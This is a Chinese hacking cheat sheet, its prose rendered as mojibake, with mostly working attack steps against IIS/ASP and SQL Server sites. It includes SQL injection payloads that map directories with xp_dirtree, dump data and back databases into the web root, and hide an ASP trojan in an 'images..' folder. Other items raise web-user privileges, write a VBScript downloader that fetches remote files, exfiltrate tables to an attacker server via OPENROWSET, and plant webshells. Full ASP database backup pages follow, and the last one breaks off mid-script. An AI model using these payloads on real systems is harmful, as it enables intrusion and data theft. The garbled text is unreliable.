;create table temp(dir nvarchar(255),depth varchar(255));--,璇ヨ〃鐨刣ir瀛楁琛ㄧず鐩綍鐨勫悕縐幫紝depth瀛楁琛ㄧず鐩綍鐨勬繁搴︺傜劧鍚庢墽琛寈p_dirtree鑾峰緱D鐩樼殑鐩綍鏍戯紝璇彞濡備笅錛?
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

鍦ㄨ繘琛屼笅闈㈢殑鎿嶄綔鍓嶏紝鍏堟煡鐪婦鐩樻湁鍑犱釜鏂囦歡澶癸紝榪欐牱瀵笵鐩樻湁涓ぇ鑷寸殑浜嗚В錛岃鍙ュ涓嬶細
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?))>=鏁板瓧(鏁板瓧=0銆?銆?銆?...)

鎺ョ潃錛屾垜浠湪瀵規柟鐨勭綉绔欎笂鎵懼嚑涓竴綰у瓙鐩綍錛屽user銆乸hoto錛岀劧鍚庯紝鐢ㄧ瓫閫夌殑鏂規硶鏉ュ垽鏂璚EB鏍圭洰褰曚笂鏄惁瀛樺湪姝ょ洏涓婏紝璇彞濡備笅錛?
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

鐪嬭鍙ョ殑榪斿洖緇撴灉錛屽鏋滀負鐪燂紝琛ㄧずWEB鏍圭洰褰曟湁鍙兘鍦ㄦ鐩樹笂錛屼負浜嗚繘涓姝ョ‘璁わ紝澶氭祴璇曞嚑涓瓙鐩綍錛?
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

濡傛灉鎵鏈夌殑嫻嬭瘯緇撴灉閮戒負鐪燂紝琛ㄧずWEB鏍圭洰褰曞緢鏈夊彲鑳藉湪姝ょ洏涓娿?

涓嬮潰鍋囪鎵懼埌鐨刉EB鏍圭洰褰曞湪姝ょ洏涓婏紝鐢ㄤ互涓嬬殑璇彞鏉ヨ幏寰椾竴綰у瓙鐩綍鐨勬繁搴︼細
and (select depth from temp where dir='user')>=鏁板瓧(鏁板瓧=1銆?銆?...)

鍋囪寰楀埌鐨刣epth鏄?,璇存槑user鐩綍鏄疍鐩樼殑3綰х洰褰曪紝鍒橶EB鏍圭洰褰曟槸D鐩樼殑浜岀駭鐩綍銆?

鐩墠鎴戜滑宸茬粡鐭ラ亾浜嗘牴鐩綍鎵鍦ㄧ殑鐩樼鍜屾繁搴︼紝瑕佹壘鍒版牴鐩綍鐨勫叿浣撲綅緗紝鎴戜滑鏉ヤ粠D鐩樻牴鐩綍寮濮嬮愪竴鎼滃錛屽綋鐒訛紝娌℃湁蹇呰鐭ラ亾姣忎釜鐩綍鐨勫悕縐幫紝鍚﹀垯澶楄垂鏃墮棿浜嗐?

鎺ヤ笅鏉ワ紝鍙﹀寤虹珛涓涓復鏃惰〃錛岀敤鏉ュ瓨鏀綝鐩樼殑1綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰曪紝璇彞濡備笅錛?

;create table temp1(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑絎竴涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑絎簩涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝鍙渶鎶婄浜屼釜top 1鏀逛負top 2灝辮浜嗐?

鐜板湪錛宼emp1涓凡緇忎繚瀛樹簡鎵鏈塂鐩樼涓綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰?鐒跺悗錛屾垜浠敤鍚屾牱鐨勬柟娉曟潵鍒ゆ柇鏍圭洰褰曟槸鍚﹀湪姝や竴綰у瓙鐩綍涓嬶細
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
濡傛灉榪斿洖涓虹湡錛岃〃紺烘牴鐩綍鍙兘鍦ㄦ瀛愮洰褰曚笅錛岃浣忚澶氭祴璇曞嚑涓緥瀛愶紝濡傛灉閮借繑鍥炰負鍋囷紝鍒欒〃鏄嶹EB鏍圭洰褰曚笉鍦ㄦ鐩綍涓嬶紝鐒跺悗鎴戜滑鍦ㄧ敤鍚屾牱鐨勬柟娉曟潵鑾峰緱D鐩樼2銆?...涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞垪琛紝鏉ュ垽鏂璚EB鏍圭洰褰曟槸鍚﹀湪鍏朵笅銆備絾鏄紝瑕佹敞鎰忥紝鐢▁p_dirtree鍓嶄竴瀹氳鎶妕emp1琛ㄤ腑鐨勫唴瀹瑰垹闄ゃ?

鐜板湪鍋囪錛學EB鏍圭洰褰曞湪D鐩樼殑絎竴綰у瓙鐩綍涓嬶紝璇ュ瓙鐩綍鍚嶇О涓簑ebsite,鎬庢牱鑾峰緱榪欎釜鐩綍鐨勫悕縐版垜鎯充笉鐢ㄦ垜璇翠簡鍚с傚洜涓哄墠闈㈡垜浠煡閬撲簡WEB鏍圭洰褰曠殑娣卞害涓?錛屾垜浠渶瑕佺煡閬搘ebsite涓嬪埌搴曞摢涓墠鏄湡姝g殑WEB鏍圭洰褰曘?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曪紝鍐嶅緩绔嬬3涓復鏃惰〃錛?
;create table temp2(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑website涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp2涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑website涓嬬浜屼釜瀛愮洰褰曚笅鐨勬墍鏈夌洰褰曞瓨鍒皌emp2涓紝鍙渶鎶婄浜屼釜top 1鏀逛負top 2灝辮浜嗐?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曞垽鏂鐩綍鏄惁涓烘牴鐩綍錛?
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
濡傛灉榪斿洖涓虹湡錛屼負浜嗙‘瀹氭垜浠殑鍒ゆ柇錛屽嫻嬭瘯鍑犱釜渚嬪瓙錛屾柟娉曚笂闈㈤兘璁插埌浜嗭紝濡傛灉澶氫釜渚嬪瓙閮借繑鍥炰負鐪燂紝閭d箞灝辯‘瀹氫簡璇ョ洰褰曚負WEB鏍圭洰褰曘?


鐢ㄤ互涓婄殑鏂規硶鍩烘湰涓婂彲浠ヨ幏寰梂EB鏍圭洰褰曪紝鐜板湪鎴戜滑鍋囪WEB鏍圭洰褰曟槸錛欴:\website\www
鐒跺悗錛屾垜浠氨鍙互澶囦喚褰撳墠鏁版嵁搴撳埌榪欎釜鐩綍涓嬬敤鏉ヤ笅杞姐傚浠藉墠鎴戜滑鎶妕emp銆乼emp1銆乼emp2鐨勫唴瀹規竻絀猴紝鐒跺悗C銆丏銆丒鐩樼殑鐩綍鏍戝垎鍒瓨鍒皌emp銆乼emp1銆乼emp2涓?

涓嬭澆瀹屾暟鎹簱鍚庤璁板緱鎶婁笁涓復鏃惰〃DROP鎺夛紝鐜板湪鎴戜滑鍦ㄤ笅杞界殑鏁版嵁搴撲腑鍙互鎵懼埌鎵鏈夌殑鐩綍鍒楄〃錛屽寘鎷悗鍙扮鐞嗙殑鐩綍浠ュ強鏇村淇℃伅銆?br>
21銆亀in2000涓嬪皢WEB鐢ㄦ埛鎻愬崌涓虹郴緇熺敤鎴鋒潈闄愶紝闇瑕佹湁綆$悊鍛樼殑鏉冮檺鎵嶈兘鎵ц錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

鏌ョ湅鏄惁鎴愬姛錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
鐗堟潈鎵鏈?C) Microsoft Corporation 1996-2001銆備繚鐣欐墍鏈夋潈鍒┿?br>inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22銆佸浣曢殣钘廇SP鏈ㄩ┈錛?br>寤虹珛闈炴爣鍑嗙洰褰曪細mkdir images..\
鎷瘋礉ASP鏈ㄩ┈鑷崇洰褰曪細copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
閫氳繃web璁塊棶ASP鏈ㄩ┈錛?a href="http://ip/images../news.asp?action=login" target=_blank>http://ip/images../news.asp?action=login
濡備綍鍒犻櫎闈炴爣鍑嗙洰褰曪細rmdir images..\ /s

23銆佸幓鎺塼enlnet鐨刵tlm璁よ瘉錛?br>;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'鈥?br>
24銆佺敤echo鍐欏叆鏂囦歡涓嬭澆鑴氭湰iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25銆佹墜宸ュ緩绔婭IS闅愯棌鐩綍鐨勬柟娉曪細
?   鏌ョ湅鏈湴铏氭嫙鐩綍鍒楄〃錛歝script.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   鏂板緩涓涓猭iss鐩綍錛歮kdir c:\asp\kiss
?   寤虹珛kiss铏氭嫙鐩綍錛歝script.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   涓簁iss鐩綍鍔犳墽琛屽拰鍐欐潈闄愶細
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   璁塊棶錛?a target=_blank>http://127.0.0.1/kiss/test.asp

26銆佷嬌鐢╫penrowset()榪炲洖鏈湴鍋氭祴璇曪細
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27銆佽幏寰椾富鏈哄悕錛?br>http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28銆佽幏寰楁暟鎹簱鐢ㄦ埛鍚嶏細
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29銆佹櫘閫氱敤鎴瘋幏寰梂EBSHELL鐨勬柟娉曚箣浜岋細
?   鎵撳寘錛?br>EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
瑙e寘錛屽彲浠ョ敤浜庡緱鍒皐ebshell錛?br>?   EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
?   璇諱換鎰忔枃浠跺唴瀹癸紝瑕佹眰鏈塵aster鐨刣bo鏉冮檺錛?br>EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30銆乻a 鏉冮檺涓嬪凡鐭eb璺緞鐩存帴澶囦喚鏁版嵁搴撳埌web璺緞涓?br>
http://www.XXXX.com/FullStory.asp?id=1;backuup database 鏁版嵁搴撳悕 to disk='c:\inetpub\wwwroot\save.db' 鍒欐妸寰楀埌鐨勬暟鎹唴瀹瑰叏閮ㄥ浠藉埌WEB鐩綍涓嬶紝鍐嶇敤HTTP鎶婃鏂囦歡涓嬭澆(褰撶劧棣栭夎鐭ラ亾WEB铏氭嫙鐩綍)銆?br>
?   閬嶅巻緋葷粺鐨勭洰褰曠粨鏋勶紝鍒嗘瀽緇撴灉騫跺彂鐜癢EB铏氭嫙鐩綍錛屽厛鍒涘緩涓涓復鏃惰〃錛歵emp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?   銆鎺ヤ笅鏉ワ細鎴戜滑鍙互鍒╃敤xp_availablemedia鏉ヨ幏寰楀綋鍓嶆墍鏈夐┍鍔ㄥ櫒,騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   鎴戜滑鍙互閫氳繃鏌ヨtemp鐨勫唴瀹規潵鑾峰緱椹卞姩鍣ㄥ垪琛ㄥ強鐩稿叧淇℃伅鎴栬呭埄鐢▁p_subdirs鑾峰緱瀛愮洰褰曞垪琛?騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
?   鎴戜滑榪樺彲浠ュ埄鐢▁p_dirtree鑾峰緱鎵鏈夊瓙鐩綍鐨勭洰褰曟爲緇撴瀯,騫跺鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 榪欐牱灝卞彲浠ユ垚鍔熺殑嫻忚鍒版墍鏈夌殑鐩綍錛堟枃浠跺す錛夊垪琛?br>?   濡傛灉鎴戜滑闇瑕佹煡鐪嬫煇涓枃浠剁殑鍐呭錛屽彲浠ラ氳繃鎵цxp_cmdsell錛?insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
?   浣跨敤'bulk insert'璇硶鍙互灝嗕竴涓枃鏈枃浠舵彃鍏ュ埌涓涓復鏃惰〃涓傚錛歜ulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'   嫻忚temp灝卞彲浠ョ湅鍒癷ndex.asp鏂囦歡鐨勫唴瀹逛簡錛侀氳繃鍒嗘瀽鍚勭ASP鏂囦歡錛屽彲浠ュ緱鍒板ぇ閲忕郴緇熶俊鎭紝WEB寤鴻涓庣鐞嗕俊鎭紝鐢氳嚦鍙互寰楀埌SA甯愬彿鐨勮繛鎺ュ瘑鐮併?br>
31銆佷竴浜泂ql涓殑鎵╁睍瀛樺偍鐨勬葷粨:
xp_availablemedia 鏄劇ず緋葷粺涓婂彲鐢ㄧ殑鐩樼'C:\' xp_availablemedia
xp_enumgroups 鍒楀嚭褰撳墠緋葷粺鐨勪嬌鐢ㄧ兢緇勫強鍏惰鏄?xp_enumgroups
xp_enumdsn 鍒楀嚭緋葷粺涓婂凡緇忚緗ソ鐨凮DBC鏁版嵁婧愬悕縐?xp_enumdsn
xp_dirtree 鏄劇ず鏌愪釜鐩綍涓嬬殑瀛愮洰褰曚笌鏂囦歡鏋舵瀯 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 鑾峰彇鏌愭枃浠剁殑鐩稿叧灞炴?xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 灝嗙洰鏍囪綆楁満澶氫釜妗f鍘嬬緝鍒版煇涓。妗堥噷鎵鍘嬬緝鐨勬。妗堥兘鍙互鎺ュ湪鍙傛暟鐨勫悗闈㈢敤璞嗗彿闅斿紑 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 瑙e帇緙?xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 鍒楀嚭鏈嶅姟鍣ㄥ煙鍚?xp_ntsec_enumdomains
xp_servicecontrol 鍋滄鎴栬呭惎鍔ㄦ煇涓湇鍔?xp_servicecontrol 'stop','schedule'
xp_terminate_process 鐢╬id鏉ュ仠姝㈡煇涓墽琛屼腑鐨勭▼搴?xp_terminate_process 123
dbo.xp_subdirs 鍙垪鏌愪釜鐩綍涓嬬殑瀛愮洰褰?dbo.xp_subdirs 'C:\'

32銆?br>USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1銆傝幏寰楁墍鏈夌殑瀛樺偍榪囩▼鐨勮剼鏈細
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2銆傝幏寰楁墍鏈夌殑瑙嗗浘鐨勮剼鏈細
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33銆丏B_OWNER鏉冮檺涓嬬殑鏁版嵁搴撳浠芥柟娉?br>鐢╫penrowset鍚с傚弽榪炲埌鑷繁鐨勬暟鎹簱鏈哄櫒錛寏鍏堝湪鏈湴寤轟釜璺熺洰鏍囨満鍣ㄤ竴鏍風粨鏋勭殑琛▇瀛楁綾誨瀷浣跨敤nvarchar.鐒跺悗鐢ㄦ搗媧嬭繛鎺ュ鏂圭殑SQL鏁版嵁搴擄紝鍦ㄦ煡璇㈠垎鏋愰偅閲屾墽琛?br>insert into OPENROWSET ('sqloledb','server=浣犳暟鎹簱鏈嶅姟鍣ㄧ殑IP;uid=user;pwd=pass;database=dbname;','select * from 浣犲緩绔嬬殑琛? select * from 瀵規柟鐨勮〃鈥?br>瑕佹槸鏁版嵁閲忓お澶х殑璇濆氨鐪嬬湅浠栨暟鎹簱閲屾湁娌℃湁鑷姩緙栧彿鐨勫瓧孌?select * from 琛ㄥ悕 where id>100
榪欐牱鏉ュ紕鍚?br>瑕佹槸鍜學EB鍚屽彴鐨勮瘽錛岀洿鎺ュ皢搴揃AK鍒癢EB鐩綍涓嬪洖鏉ュ氨OK鍟︺傘傘備笉榪囧墠鎻愬簱涓嶈兘澶ぇ錛岃秴榪?G鐨勮瘽SQL灝辮秴鏃朵簡
濡傛灉鏄疭A鏉冮檺鍙互鍒╃敤涓嬮潰鐨勪袱涓狝SP紼嬪簭鏉ュ浠芥暟鎹簱錛?br>
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?lt;/TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
閫夋嫨鎿嶄綔錛?lt;INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>澶囦喚</label>銆
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>鎭㈠</label>
<br>鏁版嵁搴撳悕錛?lt;INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>鏂囦歡璺緞錛?lt;INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞,澶囦喚鎴怑XE涓昏涓轟簡鏂逛究涓嬭澆,媧繪椿..)<br>
<input type="submit" value="紜畾">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql鏈嶅姟鍣?br>sqlname = "sa" '鐢ㄦ埛鍚?br>sqlpassword = "鏁版嵁搴撳瘑鐮? '瀵嗙爜
sqlLoginTimeout = 15 '鐧婚檰瓚呮椂
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act = "restore" then
'鎭㈠鏃惰鍦ㄦ病鏈変嬌鐢ㄦ暟鎹簱鏃惰繘琛岋紒
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>娌℃湁閫夋嫨鎿嶄綔</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0 </font></td>
</tr>
<tr>
<td>閫夋嫨鎿嶄綔錛?br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>澶囦喚</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>鎭㈠</label></td>
</tr>
<tr>
<td><label>SQL鏈嶅姟鍣?
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>鐢ㄦ埛鍚?
  <input name="sqlname" type="text" value="sa" />
瀵?鐮?
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>鏁版嵁搴撳悕錛?br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>鏂囦歡璺緞錛?br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞)</td>
</tr>
<tr>
<td><% Response.write "鏈枃浠剁粷瀵硅礬寰?" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="紜?瀹? />
    <input name="Submit" type="reset" class="liuyes" size="10" value="閲?緗? /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>鎻愮ず淇℃伅:<%
if request("action")="" then  
response.write "<font color=#ff0000>涓嶇敤鎴戝璇翠粈涔堜簡鍚э紒</font>"
end if
'SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>娌℃湁杈撳叆鏁版嵁搴撳悕縐?</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action   = 0
bak.Initialize   = 1
'bak.Replace   = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act="restore" then
